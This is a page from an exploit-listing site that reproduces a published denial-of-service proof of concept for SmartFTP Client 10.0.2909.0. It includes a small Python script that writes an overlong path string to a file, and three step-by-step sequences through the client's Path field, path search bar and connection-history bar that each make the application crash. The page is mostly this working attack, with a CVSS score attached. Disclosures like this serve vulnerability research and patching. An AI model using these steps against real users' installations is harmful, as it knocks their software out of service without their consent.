Advertisement






SmartFTP Client 10.0.2909.0 Multiple Denial of Service

CVE Category Price Severity
N/A CWE-770 N/A High
Author Risk Exploitation Type Date
N/A High Remote 2021-09-06
CVSS
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090050

Below is a copy:

SmartFTP Client 10.0.2909.0 Multiple Denial of Service
# Exploit Title: SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service
# Date: 9/5/2021
# Exploit Author: Eric Salario
# Vendor Homepage: https://www.smartftp.com/en-us/
# Software Link: https://www.smartftp.com/en-us/download
# Version: 10.0.2909.0 (32 and 64 bit)
# Tested on: Microsoft Windows 10 32 bit and 64 bit

=========================================================================

buffer = "//"
buffer += "A" * 423

f = open ("path.txt", "w")
f.write(buffer)
f.close()

1. Run the python script
2. Open SmartFTP > New Connection > FTPS (explicit)
3. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255)
4. In Path, copy paste the content of the "path.txt" generated by the python script
5. Click "OK"
6. SmartFTP client crashes

=======================================================================
1. Open SmartFTP > New Connection > FTPS (explicit)
2. Enter a non existing ip the FTP server can't reach (e.g 255.255.255.255)
3. In Path, type slash ("/") and click "OK"
4. The app should return "Error 0x80072741"
5. In the path's search bar, replace slash ("/") with whatever and press enter
6. SmartFTP client crashes

=======================================================================

1. Open SmartFTP
2. In the "New Connection" bar, clear the history (dropdown to the right of the bar)
3. Once the history is empty, click the bar and type anything
3. SmartFTP client crashes

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.